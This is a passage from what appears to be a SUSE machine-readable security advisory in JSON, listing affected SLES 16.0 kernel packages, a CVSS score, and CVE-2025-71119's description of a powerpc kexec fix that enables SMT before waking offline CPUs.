"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71118"
},
{
"cve": "CVE-2025-71119",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71119"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/kexec: Enable SMT before waking offline CPUs\n\nIf SMT is disabled or a partial SMT state is enabled, when a new kernel\nimage is loaded for kexec, on reboot the following warning is observed:\n\nkexec: Waking offline cpu 228.\nWARNING: CPU: 0 PID: 9062 at arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc\n[snip]\n NIP kexec_prepare_cpus+0x1b0/0x1bc\n LR kexec_prepare_cpus+0x1a0/0x1bc\n Call Trace:\n kexec_prepare_cpus+0x1a0/0x1bc (unreliable)\n default_machine_kexec+0x160/0x19c\n machine_kexec+0x80/0x88\n kernel_kexec+0xd0/0x118\n __do_sys_reboot+0x210/0x2c4\n system_call_exception+0x124/0x320\n system_call_vectored_common+0x15c/0x2ec\n\nThis occurs as add_cpu() fails due to cpu_bootable() returning false for\nCPUs that fail the cpu_smt_thread_allowed() check or non primary\nthreads if SMT is disabled.\n\nFix the issue by enabling SMT and resetting the number of SMT threads to\nthe number of threads per core, before attempting to wake up all present\nCPUs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
